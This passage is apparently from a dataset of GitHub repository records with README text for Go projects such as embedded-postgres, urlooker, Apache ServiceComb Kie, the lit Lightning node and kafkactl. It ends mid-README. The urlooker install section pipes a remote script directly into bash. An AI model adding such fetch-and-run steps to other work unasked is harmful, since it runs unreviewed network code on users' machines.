defaults\n\n| Configuration | Default Value |\n|---------------------|-------------------------------------------------|\n| Username | postgres |\n| Password | postgres |\n| Database | postgres |\n| Version | 12.1.0 |\n| RuntimePath | $USER_HOME/.embedded-postgres-go/extracted |\n| DataPath | $USER_HOME/.embedded-postgres-go/extracted/data |\n| BinariesPath | $USER_HOME/.embedded-postgres-go/extracted |\n| BinaryRepositoryURL | https://repo1.maven.org/maven2 |\n| Port | 5432 |\n| StartTimeout | 15 Seconds |\n\nThe *RuntimePath* directory is erased and recreated at each `Start()` and therefore not suitable for persistent data.\n\nIf a persistent data location is required, set *DataPath* to a directory outside *RuntimePath*.\n\nIf the *RuntimePath* directory is empty or already initialized but with an incompatible postgres version, it will be\nremoved and Postgres reinitialized.\n\nPostgres binaries will be downloaded and placed in *BinaryPath* if `BinaryPath/bin` doesn't exist.\n*BinaryRepositoryURL* parameter allow overriding maven repository url for Postgres binaries.\nIf the directory does exist, whatever binary version is placed there will be used (no version check\nis done). \nIf your test need to run multiple different versions of Postgres for different tests, make sure\n*BinaryPath* is a subdirectory of *RuntimePath*.\n\nA single Postgres instance can be created, started and stopped as follows\n\n```go\npostgres := embeddedpostgres.NewDatabase()\nerr := postgres.Start()\n\n// Do test logic\n\nerr := postgres.Stop()\n```\n\nor created with custom configuration\n\n```go\nlogger := &bytes.Buffer{}\npostgres := NewDatabase(DefaultConfig().\nUsername(\"beer\").\nPassword(\"wine\").\nDatabase(\"gin\").\nVersion(V12).\nRuntimePath(\"/tmp\").\nBinaryRepositoryURL(\"https://repo.local/central.proxy\").\t\nPort(9876).\nStartTimeout(45 * time.Second).\nLogger(logger))\nerr := postgres.Start()\n\n// Do test logic\n\nerr := postgres.Stop()\n```\n\nIt should be noted that if `postgres.Stop()` is not called then the child Postgres process will not be released and the\ncaller will block.\n\n## Examples\n\nThere are a number of realistic representations of how to use this library\nin [examples](https://github.com/fergusstrange/embedded-postgres/tree/master/examples).\n\n## Credits\n\n- [Gopherize Me](https://gopherize.me) Thanks for the awesome logo template.\n- [zonkyio/embedded-postgres-binaries](https://github.com/zonkyio/embedded-postgres-binaries) Without which the\n precompiled Postgres binaries would not exist for this to work.\n\n## Contributing\n\nView the [contributing guide](CONTRIBUTING.md).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "710leo/urlooker", "link": "https://github.com/710leo/urlooker", "tags": ["open-falcon", "url-monitor", "devops", "api-monitor", "api", "website-monitor", "statsd", "prometheus", "nightingale", "monitoring"], "stars": 540, "description": "enterprise-level websites monitoring system", "lang": "Go", "repo_lang": "", "readme": "## [urlooker](https://github.com/710leo/urlooker)\n\u76d1\u63a7web\u670d\u52a1\u53ef\u7528\u6027\u53ca\u8bbf\u95ee\u8d28\u91cf\uff0c\u91c7\u7528go\u8bed\u8a00\u7f16\u5199\uff0c\u6613\u4e8e\u5b89\u88c5\u548c\u4e8c\u6b21\u5f00\u53d1 \n[English](https://github.com/710leo/urlooker)|[\u4e2d\u6587](https://github.com/710leo/urlooker/blob/master/readme_zh.md)\n\n## Feature\n- \u8fd4\u56de\u72b6\u6001\u7801\u68c0\u6d4b\n- \u9875\u9762\u54cd\u5e94\u65f6\u95f4\u68c0\u6d4b\n- \u9875\u9762\u5173\u952e\u8bcd\u5339\u914d\u68c0\u6d4b\n- \u81ea\u5b9a\u4e49Header\n- GET\u3001POST\u3001PUT\u8bbf\u95ee\n- \u81ea\u5b9a\u4e49POST BODY\n- \u68c0\u6d4b\u7ed3\u679c\u652f\u6301\u63a8\u9001 nightingale\u3001open-falcon\n\n## Architecture\n![Architecture](img/urlooker_arch.png)\n\n## ScreenShot\n\n![ScreenShot](img/urlooker1.png)\n![ScreenShot](img/urlooker2.png)\n\n\n## \u5e38\u89c1\u95ee\u9898\n- [wiki\u624b\u518c](https://github.com/710leo/urlooker/wiki)\n- [\u5e38\u89c1\u95ee\u9898](https://github.com/710leo/urlooker/wiki/FAQ)\n- \u521d\u59cb\u7528\u6237\u540d\u5bc6\u7801\uff1aadmin/password\n\n## Install\n#### docker \u5b89\u88c5\n\n```bash\ngit clone https://github.com/710leo/urlooker.git\ncd urlooker\ndocker build .\ndocker volume create urlooker-vol\ndocker run -p 1984:1984 -d --name urlooker --mount source=urlooker-vol,target=/var/lib/mysql --restart=always [CONTAINER ID]\n```\n\n#### \u6e90\u7801\u5b89\u88c5\n\n```bash\n# \u5b89\u88c5mysql\nyum install -y mysql-server\nwget https://raw.githubusercontent.com/710leo/urlooker/master/sql/schema.sql\nmysql -h 127.0.0.1 -u root -p < schema.sql\n\n# \u5b89\u88c5\u7ec4\u4ef6\ncurl https://raw.githubusercontent.com/710leo/urlooker/master/install.sh|bash\ncd $GOPATH/src/github.com/710leo/urlooker\n\n# \u5c06[mysql root password]\u66ff\u6362\u4e3amysql root \u6570\u636e\u5e93\u5bc6\u7801\nsed -i 's/urlooker.pass/[mysql root password]/g' configs/web.yml\n\n./control start all\n```\n\n\u6253\u5f00\u6d4f\u89c8\u5668\u8bbf\u95ee http://127.0.0.1:1984 \u5373\u53ef\n\n## \u7b54\u7591\nQQ\u7fa4\uff1a556988374\n\n## Thanks\n\u4e00\u4e9b\u529f\u80fd\u53c2\u8003\u4e86open-falcon\uff0c\u611f\u8c22 [UlricQin](http://ulricqin.com) & [laiwei](https://github.com/laiwei)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/servicecomb-kie", "link": "https://github.com/apache/servicecomb-kie", "tags": ["servicecomb"], "stars": 540, "description": "Apache ServiceComb MetaConfig", "lang": "Go", "repo_lang": "", "readme": "# Apache-ServiceComb-Kie \n\n[![Build Status](https://travis-ci.org/apache/servicecomb-kie.svg?branch=master)](https://travis-ci.org/apache/servicecomb-kie?branch=master) \n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![Coverage Status](https://coveralls.io/repos/github/apache/servicecomb-kie/badge.svg?branch=master)](https://coveralls.io/github/apache/servicecomb-kie?branch=master)\nA service for configuration management in distributed system.\n\n## Conceptions\n\n### Key\nKey could indicate a configuration like \"timeout\",\nthen the value could be \"3s\"\nor indicates a file name \"app.properties\", \nthen the value could be content of app.properties\n\n### Labels\nEach key could has labels. labels indicates a unique key.\nA key \"log_level\" with labels \"env=production\" \nmay saves the value \"INFO\" for all application log level in production environment.\nA key \"log_level\" with labels \"env=production, component=payment\" \nmay saves the value \"DEBUG\" for payment service in production environment.\n\nIt means all payment service print debug log, but for other service print info log.\n\nSo you can control your application runtime behaviors \nby setting different labels to a key.\n\n\n## Why use kie\nkie is a highly flexible config server. Nowadays, an operation team is facing different \"x-centralized\" system.\nFor example a classic application-centralized system. A operator wants to change config based on application name and version, then the label could be \"app,version\" for locating a app's configurations.\nMeanwhile some teams manage app in a data center, each application instance will be deployed in a VM machine. then label could be \"farm,role,server,component\" to locate a app's configurations.\nkie fit different senario for configuration management which benifit from label design.\n\n\n## Components\nIt includes 1 components\n\n- server: rest api service to manage kv\n\n## Features\n- kv management: you can manage config item by key and label\n- kv revision mangement: you can mange all kv change history\n- kv change event: use long polling to watch kv changes, highly decreased network cost\n- polling detail track: if any client poll config from server, the detail will be tracked\n## Quick Start\n\n### Run locally with Docker compose\n\n```bash\ngit clone git@github.com:apache/servicecomb-kie.git\ncd servicecomb-kie/deployments/docker\nsudo docker-compose up\n```\nIt will launch 3 components \n- mongodb: 127.0.0.1:27017\n- mongodb UI: http://127.0.0.1:8081\n- servicecomb-kie: http://127.0.0.1:30110\n\n\n## Development\nTo see how to build a local dev environment, check [here](examples/dev)\n\n### Build\nThis will build your own service image and binary in local\n```bash\ncd build\nexport VERSION=0.0.1 #optional, it is latest by default\n./build_docker.sh\n```\n\nThis will generate a \"servicecomb-kie-0.0.1-linux-amd64.tar\" in \"release\" folder,\nand a docker image \"servicecomb/kie:0.0.1\"\n\n# API Doc\nAfter you launch kie server, you can browse API doc in http://127.0.0.1:30110/apidocs.json, \ncopy this doc to http://editor.swagger.io/\n# Documentations\nhttps://kie.readthedocs.io/en/latest/\n\nor follow [here](docs/README.md) to generate it in local\n\n## Clients\n- go https://github.com/go-chassis/kie-client\n\n## Contact\n\nBugs: [issues](https://issues.apache.org/jira/browse/SCB)\n\n## Contributing\n\nSee [Contribution guide](http://servicecomb.apache.org/developers/contributing) for details on submitting patches and the contribution workflow.\n\n## Reporting Issues\n\nSee reporting bugs for details about reporting any issues.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mit-dci/lit", "link": "https://github.com/mit-dci/lit", "tags": [], "stars": 540, "description": "Lightning Network node software", "lang": "Go", "repo_lang": "", "readme": "# lit - a lightning node you can run on your own\n\n![Lit Logo](litlogo145.png)\n\n[![Build Status](http://hubris.media.mit.edu:8080/job/lit-PR/badge/icon)](http://hubris.media.mit.edu:8080/job/lit/)\n\nUnder development, not for use with real money.\n\n## Setup\n\n### Prerequisites\n\n* [Git](https://git-scm.com/)\n\n* [Go](https://golang.org/doc/install)\n\n* make\n\n* (Optional, Windows) [Cygwin](https://cygwin.com/install.html)\n\n* (Optional, for full test suite) Python 3 + `requests` library from PyPI\n\n### Downloading\n\nClone the repo from git \n\n```bash\ngit clone https://github.com/mit-dci/lit\ncd lit\n```\nor `go get` it\n```go\ngo get -v github.com/mit-dci/lit\n```\n\n### Installation\n\n#### Linux, macOS, Cygwin, etc.\n\nYou can either use Go's built-in dependency management and build tool\n```go\ncd {GOPATH}/src/github.com/mit-dci/lit\ngo get -v ./...\ngo build\n```\nor use the Makefile\n```bash\nmake # or make all\n```\n\nTo run the python integration tests (which requires `bitcoind`), run `make test with-python=false`\n\n#### Windows\n\nInstall [Cygwin](http://www.cygwin.com) and follow the setup instructions or download prebuilt binaries from\n\n1. Make sure that environmental variable `%GOPATH%` is initizlized correctly.\n\n2. Download required dependencies and then build with:\n\n```\ngo get -v ./...\ncd %GOPATH%\\src\\github.com\\mit-dci\\lit\ngo build -v .\ngo build -v .\\cmd\\lit-af\n```\n\n### Running lit\n\nThe below command will run Lit on the Bitcoin testnet3 network\n\n(Note: Windows users should take off `./` but need to change `lit` to `lit.exe`)\n\n```bash\n./lit --tn3=true\n```\n\nThe words `yup, yes, y, true, 1, ok, enable, on` can be used to specify that Lit\nautomatically connect to peers fetched from a list of DNS seeds. It can also be replaced by\nthe address of the node you wish to connect to. For example for the btc testnet3:\n\n```bash\n./lit --tn3=localhost\n```\n\nIt will use default port for different nodes. See the \"Command line arguments\" section.\n\n### Packaging\n\nYou can make an archive package for any distribution by doing:\n\n```\n./build/releasebuild.sh \n```\n\nand it will be placed in `build/_releasedir`. It should support any OS that\nGo and lit's dependencies support. In place of `windows` use `win` and\nin place of `386` use `i386`.\n\nYou can also package for Linux, macOS, and Windows in both amd64 and\ni386 architectures by running `make package`. (NOTE: macOS is amd64 only)\n\nRunning `./build/releasebuild.sh clean` cleans the directories it generates.\n\n## Using Lightning\n\nOnce you are done setting up lit, you can read about\n- [the different command line arguments](#command-line-arguments)\n- [the various folders](#folders) or\n- [checkout the Walkthrough](./WALKTHROUGH.md)\n\n## Contributing\n\nPull Requests and Issues are most welcome, checkout [Contributing](./CONTRIBUTING.md) to get started.\n\n## Command line arguments\n\nWhen starting lit, the following command line arguments are available. The\nfollowing commands may also be specified in `lit.conf` which is automatically\ngenerated on startup with `tn3=1` by default.\n\n#### Connecting to networks\n\n| Arguments | Details | Default Port |\n| --------------------------- |--------------------------------------------------------------| ------------- |\n| `--tn3 ` | connect to `nodeHostName`, which is a bitcoin testnet3 node. | 18333 |\n| `--reg ` | connect to `nodeHostName`, which is a bitcoin regtest node. | 18444 |\n| `--lt4 ` | connect to `nodeHostName`, which is a litecoin testnet4 node.| 19335 |\n\n#### Other settings\n\n| Arguments | Details |\n| ---------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| `-v` or `--verbose` | Verbose; log everything to stdout as well as the lit.log file. Lots of text. |\n| `--dir ` | Use `folderPath` as the directory. By default, saves to `~/.lit/`. |\n| `-p` or `--rpcport ` | Listen for RPC clients on port `portNumber`. Defaults to `8001`. Useful when you want to run multiple lit nodes on the same computer (also need the `--dir` option). |\n| `-r` or `--reSync` | Try to re-sync to the blockchain. |\n\n## Folders\n\n| Folder Name | Details |\n|:-------------|:-----------------------------------------------------------------------------------------------------------------------------------------|\n| `bech32` | Util for the Bech32 format |\n| `btcutil` | Bitcoin-specific libraries |\n| `build` | Tools used for building Lit |\n| `cmd` | Has some rpc client code to interact with the lit node. Not much there yet |\n| `coinparam` | Information and other constants for identifying currencies |\n| `consts` | Global constants |\n| `crypto` | Utility cryptographic libraries |\n| `dlc` | Discreet Log Contracts |\n| `docs` | Writeups for setting up things and screenshots |\n| `elkrem` | A hash-tree for storing `log(n)` items instead of n |\n| `litrpc` | Websockets based RPC connection |\n| `lndc` | Lightning network data connection -- send encrypted / authenticated messages between nodes |\n| `lnutil` | Widely used utility functions |\n| `portxo` | Portable utxo format, exchangable between node and base wallet (or between wallets). Should make this into a BIP once it's more stable. |\n| `powless` | Introduces a web API chainhook in addition to the uspv one |\n| `qln` | A quick channel implementation with databases. Doesn't do multihop yet. |\n| `sig64` | Library to make signatures 64 bytes instead of 71 or 72 or something |\n| `snap` | Snapcraft metadata |\n| `test` | Python Integration tests |\n| `uspv` | Deals with the network layer, sending network messages and filtering what to hand over to `wallit` |\n| `wallit` | Deals with storing and retrieving utxos, creating and signing transactions |\n| `watchtower` | Unlinkable outsourcing of channel monitoring |\n| `wire` | Tools for working with binary data structures in Bitcoin |\n\n### Hierarchy of packages\n\nOne instance of lit has one litNode (package qln).\n\nLitNodes manage lndc connections to other litnodes, manage all channels, rpc listener, and the ln.db. Litnodes then initialize and contol wallits.\n\nA litNode can have multiple wallits; each must have different params. For example, there can be a testnet3 wallit, and a regtest wallit. Eventually it might make sense to support a root key per wallit, but right now the litNode gives a rootPrivkey to each wallet on startup. Wallits each have a db file which tracks utxos, addresses, and outpoints to watch for the upper litNode. Wallits do not directly do any network communication. Instead, wallits have one or more chainhooks; a chainhook is an interface that talks to the blockchain.\n\nOne package that implements the chainhook interface is uspv. Uspv deals with headers, wire messages to fullnodes, filters, and all the other mess that is contemporary SPV.\n\n(in theory it shouldn't be too hard to write a package that implements the chainhook interface and talks to some block explorer. Maybe if you ran your own explorer and authed and stuff that'd be OK.)\n\n#### Dependency graph\n\n![Dependency Graph](docs/deps.png)\n\n## License\n\n[MIT](https://github.com/mit-dci/lit/blob/master/LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "deviceinsight/kafkactl", "link": "https://github.com/deviceinsight/kafkactl", "tags": ["apache-kafka", "avro", "cli", "kafka", "golang", "zsh", "fish"], "stars": 539, "description": "Command Line Tool for managing Apache Kafka", "lang": "Go", "repo_lang": "", "readme": "\n# kafkactl\n\nA command-line interface for interaction with Apache Kafka\n\n[![Build Status](https://github.com/deviceinsight/kafkactl/workflows/Lint%20%2F%20Test%20%2F%20IT/badge.svg?branch=main)](https://github.com/deviceinsight/kafkactl/actions)\n| [![command docs](https://img.shields.io/badge/command-docs-blue.svg)](https://deviceinsight.github.io/kafkactl/) \n\n## Features\n\n- command auto-completion for bash, zsh, fish shell including dynamic completion for e.g. topics or consumer groups.\n- support for avro schemas\n- Configuration of different contexts\n- directly access kafka clusters inside your kubernetes cluster\n- support for consuming and producing protobuf-encoded messages\n\n[![asciicast](https://asciinema.org/a/vmxrTA0h8CAXPnJnSFk5uHKzr.svg)](https://asciinema.org/a/vmxrTA0h8CAXPnJnSFk5uHKzr)\n\n## Installation\n\nYou can install the pre-compiled binary or compile from source.\n\n### Install the pre-compiled binary\n\n**snap**:\n\n```bash\nsnap install kafkactl\n```\n\n**homebrew**:\n```bash\n# install tap repostory once\nbrew tap deviceinsight/packages\n# install kafkactl\nbrew install deviceinsight/packages/kafkactl\n# upgrade kafkactl\nbrew upgrade deviceinsight/packages/kafkactl\n```\n\n**deb/rpm**:\n\nDownload the .deb or .rpm from the [releases page](https://github.com/deviceinsight/kafkactl/releases) and install with dpkg -i and rpm -i respectively.\n\n**yay (AUR)**\n\nThere's a kafkactl [AUR package](https://aur.archlinux.org/packages/kafkactl/) available for Arch. Install it with your AUR helper of choice (e.g. [yay](https://github.com/Jguer/yay)):\n\n```bash\nyay -S kafkactl\n```\n\n**manually**:\n\nDownload the pre-compiled binaries from the [releases page](https://github.com/deviceinsight/kafkactl/releases) and copy to the desired location.\n\n### Compiling from source\n\n```bash\ngo get -u github.com/deviceinsight/kafkactl\n```\n\n**NOTE:** make sure that `kafkactl` is on PATH otherwise auto-completion won't work.\n\n## Configuration\n\nIf no config file is found, a default config is generated in `$HOME/.config/kafkactl/config.yml`.\nThis configuration is suitable to get started with a single node cluster on a local machine. \n\n### Create a config file\n\nCreate `$HOME/.config/kafkactl/config.yml` with a definition of contexts that should be available\n\n```yaml\ncontexts:\n default:\n brokers:\n - localhost:9092\n remote-cluster:\n brokers:\n - remote-cluster001:9092\n - remote-cluster002:9092\n - remote-cluster003:9092\n\n # optional: tls config\n tls:\n enabled: true\n ca: my-ca\n cert: my-cert\n certKey: my-key\n # set insecure to true to ignore all tls verification (defaults to false)\n insecure: false\n\n # optional: sasl support\n sasl:\n enabled: true\n username: admin\n password: admin\n # optional configure sasl mechanism as plaintext, scram-sha256, scram-sha512 (defaults to plaintext)\n mechanism: scram-sha512\n \n # optional: access clusters running kubernetes\n kubernetes:\n enabled: false\n binary: kubectl #optional\n kubeConfig: ~/.kube/config #optional\n kubeContext: my-cluster\n namespace: my-namespace\n # optional: docker image to use (tag will be added by kafkactl based on the current version) \n image: private.registry.com/deviceinsight/kafkactl\n # optional: secret for private docker registry\n imagePullSecret: registry-secret\n\n # optional: clientID config (defaults to kafkactl-{username})\n clientID: my-client-id\n \n # optional: kafkaVersion (defaults to 2.5.0)\n kafkaVersion: 1.1.1\n\n # optional: timeout for admin requests (defaults to 3s)\n requestTimeout: 10s\n\n # optional: avro schema registry\n avro:\n schemaRegistry: localhost:8081\n # optional: configure codec for (de)serialization as standard,avro (defaults to standard)\n # see: https://github.com/deviceinsight/kafkactl/issues/123\n jsonCodec: avro\n \n # optional: default protobuf messages search paths\n protobuf:\n importPaths:\n - \"/usr/include/protobuf\"\n protoFiles:\n - \"someMessage.proto\"\n - \"otherMessage.proto\"\n protosetFiles:\n - \"/usr/include/protoset/other.protoset\"\n \n producer:\n # optional: changes the default partitioner\n partitioner: \"hash\"\n\n # optional: changes default required acks in produce request\n # see: https://pkg.go.dev/github.com/Shopify/sarama?utm_source=godoc#RequiredAcks\n requiredAcks: \"WaitForAll\"\n\n # optional: maximum permitted size of a message (defaults to 1000000)\n maxMessageBytes: 1000000\n\ncurrent-context: default\n```\n\nThe config file location is resolved by\n * checking for a provided commandline argument: `--config-file=$PATH_TO_CONFIG`\n * or by evaluating the environment variable: `export KAFKA_CTL_CONFIG=$PATH_TO_CONFIG`\n * or as default the config file is looked up from one of the following locations:\n * `$HOME/.config/kafkactl/config.yml`\n * `$HOME/.kafkactl/config.yml`\n * `$SNAP_REAL_HOME/.kafkactl/config.yml`\n * `$SNAP_DATA/kafkactl/config.yml`\n * `/etc/kafkactl/config.yml`\n\n### Auto completion\n\n#### bash\n\n**NOTE:** if you installed via snap, bash completion should work automatically.\n\n```\nsource <(kafkactl completion bash)\n```\n\nTo load completions for each session, execute once:\nLinux:\n```\nkafkactl completion bash > /etc/bash_completion.d/kafkactl\n```\n \nMacOS:\n```\nkafkactl completion bash > /usr/local/etc/bash_completion.d/kafkactl\n```\n\n#### zsh\n\nIf shell completion is not already enabled in your environment,\nyou will need to enable it. You can execute the following once:\n\n```\necho \"autoload -U compinit; compinit\" >> ~/.zshrc\n```\n\nTo load completions for each session, execute once:\n\n```\nkafkactl completion zsh > \"${fpath[1]}/_kafkactl\"\n```\n\nYou will need to start a new shell for this setup to take effect.\n\n#### Fish\n\n```\nkafkactl completion fish | source\n```\n\nTo load completions for each session, execute once:\n```\nkafkactl completion fish > ~/.config/fish/completions/kafkactl.fish\n```\n\n## Running in docker\n\nAssuming your Kafka brokers are accessible under `kafka1:9092` and `kafka2:9092`, you can list topics by running: \n\n```bash\ndocker run --env BROKERS=\"kafka1:9092 kafka2:9092\" deviceinsight/kafkactl:latest get topics\n```\n\nIf a more elaborate config is needed, you can mount it as a volume:\n\n```bash\ndocker run -v /absolute/path/to/config.yml:/etc/kafkactl/config.yml deviceinsight/kafkactl get topics\n``` \n\n## Configuration via environment variables\n\nEvery key in the `config.yml` can be overwritten via environment variables. The corresponding environment variable\nfor a key can be found by applying the following rules:\n\n1. replace `.` by `_`\n1. replace `-` by `_`\n1. write the key name in ALL CAPS\n\ne.g. the key `contexts.default.tls.certKey` has the corresponding environment variable `CONTEXTS_DEFAULT_TLS_CERTKEY`.\n\n**NOTE:** an array variable can be written using whitespace as delimiter. For example `BROKERS` can be provided as\n`BROKERS=\"broker1:9092 broker2:9092 broker3:9092\"`.\n\nIf environment variables for the `default` context should be set, the prefix `CONTEXTS_DEFAULT_` can be omitted.\nSo, instead of `CONTEXTS_DEFAULT_TLS_CERTKEY` one can also set `TLS_CERTKEY`.\nSee **root_test.go** for more examples.\n\n## Running in Kubernetes\n\n> :construction: This feature is still experimental.\n\nIf your kafka cluster is not directly accessible from your machine, but it is accessible from a kubernetes cluster\nwhich in turn is accessible via `kubectl` from your machine you can configure kubernetes support:\n\n```$yaml\ncontexts:\n kafka-cluster:\n brokers:\n - broker1:9092\n - broker2:9092\n kubernetes:\n enabled: true\n binary: kubectl #optional\n kubeContext: k8s-cluster\n namespace: k8s-namespace\n```\n\nInstead of directly talking to kafka brokers a kafkactl docker image is deployed as a pod into the kubernetes\ncluster, and the defined namespace. Standard-Input and Standard-Output are then wired between the pod and your shell\nrunning kafkactl. \n\nThere are two options:\n1. You can run `kafkactl attach` with your kubernetes cluster configured. This will use `kubectl run` to create a pod\nin the configured kubeContext/namespace which runs an image of kafkactl and gives you a `bash` into the container.\nStandard-in is piped to the pod and standard-out, standard-err directly to your shell. You even get auto-completion.\n\n2. You can run any other kafkactl command with your kubernetes cluster configured. Instead of directly\nquerying the cluster a pod is deployed, and input/output are wired between pod and your shell.\n\nThe names of the brokers have to match the service names used to access kafka in your cluster. A command like this should\n give you this information:\n```bash\nkubectl get svc | grep kafka\n```\n\n> :bulb: The first option takes a bit longer to start up since an Ubuntu based docker image is used in order to have\na bash available. The second option uses a docker image build from scratch and should therefore be quicker.\nWhich option is more suitable, will depend on your use-case. \n\n> :warning: currently _kafkactl_ must **NOT** be installed via _snap_ in order for the kubernetes feature to work. The snap runs in a sandbox and is therefore unable to access the `kubectl` binary. \n\n## Command documentation\n\nThe documentation for all available commands can be found here:\n\n[![command docs](https://img.shields.io/badge/command-docs-blue.svg)](https://deviceinsight.github.io/kafkactl/)\n\n\n## Examples\n\n### Consuming messages\n\nConsuming messages from a topic can be done with:\n```bash\nkafkactl consume my-topic\n```\n\nIn order to consume starting from the oldest offset use:\n```bash\nkafkactl consume my-topic --from-beginning\n```\n\nThe following example prints message `key` and `timestamp` as well as `partition` and `offset` in `yaml` format:\n```bash\nkafkactl consume my-topic --print-keys --print-timestamps -o yaml\n```\n\nTo print partition in default output format use:\n```bash\nkafkactl consume my-topic --print-partitions\n```\n\nHeaders of kafka messages can be printed with the parameter `--print-headers` e.g.:\n```bash\nkafkactl consume my-topic --print-headers -o yaml\n```\n\nIf one is only interested in the last `n` messages this can be achieved by `--tail` e.g.:\n```bash\nkafkactl consume my-topic --tail=5\n```\n\nThe consumer can be stopped when the latest offset is reached using `--exit` parameter e.g.:\n```bash\nkafkactl consume my-topic --from-beginning --exit\n```\n\nThe following example prints keys in hex and values in base64:\n```bash\nkafkactl consume my-topic --print-keys --key-encoding=hex --value-encoding=base64\n```\n\nThe consumer can convert protobuf messages to JSON in keys (optional) and values:\n```bash\nkafkactl consume my-topic --value-proto-type MyTopicValue --key-proto-type MyTopicKey --proto-file kafkamsg.proto\n```\n\nTo join a consumer group and consume messages as a member of the group:\n```bash\nkafkactl consume my-topic --group my-consumer-group\n```\n\nIf you want to limit the number of messages that will be read, specify `--max-messages`:\n```bash\nkafkactl consume my-topic --max-messages 2\n```\n\n### Producing messages\n\nProducing messages can be done in multiple ways. If we want to produce a message with `key='my-key'`,\n`value='my-value'` to the topic `my-topic` this can be achieved with one of the following commands:\n\n```bash\necho \"my-key#my-value\" | kafkactl produce my-topic --separator=#\necho \"my-value\" | kafkactl produce my-topic --key=my-key\nkafkactl produce my-topic --key=my-key --value=my-value\n```\n\nIf we have a file containing messages where each line contains `key` and `value` separated by `#`, the file can be\nused as input to produce messages to topic `my-topic`:\n\n```bash\ncat myfile | kafkactl produce my-topic --separator=#\n```\n\nThe same can be accomplished without piping the file to stdin with the `--file` parameter:\n```bash\nkafkactl produce my-topic --separator=# --file=myfile\n```\n\nIf the messages in the input file need to be split by a different delimiter than `\\n` a custom line separator can be provided:\n ```bash\n kafkactl produce my-topic --separator=# --lineSeparator=|| --file=myfile\n ```\n\n**NOTE:** if the file was generated with `kafkactl consume --print-keys --print-timestamps my-topic` the produce\ncommand is able to detect the message timestamp in the input and will ignore it. \n\nthe number of messages produced per second can be controlled with the `--rate` parameter:\n\n```bash\ncat myfile | kafkactl produce my-topic --separator=# --rate=200\n```\n\nIt is also possible to specify the partition to insert the message:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --partition=2\n```\n\nAdditionally, a different partitioning scheme can be used. When a `key` is provided the default partitioner\nuses the `hash` of the `key` to assign a partition. So the same `key` will end up in the same partition: \n```bash\n# the following 3 messages will all be inserted to the same partition\nkafkactl produce my-topic --key=my-key --value=my-value\nkafkactl produce my-topic --key=my-key --value=my-value\nkafkactl produce my-topic --key=my-key --value=my-value\n\n# the following 3 messages will probably be inserted to different partitions\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\n```\n\nMessage headers can also be written:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --header key1:value1 --header key2:value\\:2\n```\n\nThe following example writes the key from base64 and value from hex:\n```bash\nkafkactl produce my-topic --key=dGVzdC1rZXk= --key-encoding=base64 --value=0000000000000000 --value-encoding=hex\n```\n\nYou can control how many replica acknowledgements are needed for a response:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --required-acks=WaitForAll\n```\n\nProducing null values (tombstone record) is also possible: \n```bash\n kafkactl produce my-topic --null-value\n ```\n\nProducing protobuf message converted from JSON:\n```bash\nkafkactl produce my-topic --key='{\"keyField\":123}' --key-proto-type MyKeyMessage --value='{\"valueField\":\"value\"}' --value-proto-type MyValueMessage --proto-file kafkamsg.proto\n```\n\n### Avro support\n\nIn order to enable avro support you just have to add the schema registry to your configuration:\n```$yaml\ncontexts:\n localhost:\n avro:\n schemaRegistry: localhost:8081\n```\n\n#### Producing to an avro topic\n\n`kafkactl` will lookup the topic in the schema registry in order to determine if key or value needs to be avro encoded.\nIf producing with the latest `schemaVersion` is sufficient, no additional configuration is needed an `kafkactl` handles\nthis automatically.\n\nIf however one needs to produce an older `schemaVersion` this can be achieved by providing the parameters `keySchemaVersion`, `valueSchemaVersion`.\n\n##### Example\n\n```bash\n# create a topic\nkafkactl create topic avro_topic\n# add a schema for the topic value\ncurl -X POST -H \"Content-Type: application/vnd.schemaregistry.v1+json\" \\\n--data '{\"schema\": \"{\\\"type\\\": \\\"record\\\", \\\"name\\\": \\\"LongList\\\", \\\"fields\\\" : [{\\\"name\\\": \\\"next\\\", \\\"type\\\": [\\\"null\\\", \\\"LongList\\\"], \\\"default\\\": null}]}\"}' \\\nhttp://localhost:8081/subjects/avro_topic-value/versions\n# produce a message\nkafkactl produce avro_topic --value {\\\"next\\\":{\\\"LongList\\\":{}}}\n# consume the message\nkafkactl consume avro_topic --from-beginning --print-schema -o yaml\n```\n\n#### Consuming from an avro topic\n\nAs for producing `kafkactl` will also lookup the topic in the schema registry to determine if key or value needs to be\ndecoded with an avro schema.\n\nThe `consume` command handles this automatically and no configuration is needed.\n\nAn additional parameter `print-schema` can be provided to display the schema used for decoding.\n\n### Protobuf support\n\n`kafkactl` can consume and produce protobuf-encoded messages. In order to enable protobuf serialization/deserialization\nyou should add flag `--value-proto-type` and optionally `--key-proto-type` (if keys encoded in protobuf format) \nwith type name. Protobuf-encoded messages are mapped with [pbjson](https://developers.google.com/protocol-buffers/docs/proto3#json).\n\n`kafkactl` will search messages in following order:\n1. Protoset files specified in `--protoset-file` flag\n2. Protoset files specified in `context.protobuf.protosetFiles` config value\n3. Proto files specified in `--proto-file` flag\n4. Proto files specified in `context.protobuf.protoFiles` config value\n\nProto files may require some dependencies in `import` sections. To specify additional lookup paths use\n`--proto-import-path` flag or `context.protobuf.importPaths` config value.\n\nIf provided message types was not found `kafkactl` will return error.\n\nNote that if you want to use raw proto files `protoc` installation don't need to be installed.\n\nAlso note that protoset files must be compiled with included imports:\n```bash\nprotoc -o kafkamsg.protoset --include_imports kafkamsg.proto\n```\n\n#### Example\nAssume you have following proto schema in `kafkamsg.proto`:\n```protobuf\nsyntax = \"proto3\";\n\nimport \"google/protobuf/timestamp.proto\";\n\nmessage TopicMessage {\n google.protobuf.Timestamp produced_at = 1;\n int64 num = 2;\n}\n\nmessage TopicKey {\n float fvalue = 1;\n}\n```\n\"well-known\" `google/protobuf` types are included so no additional proto files 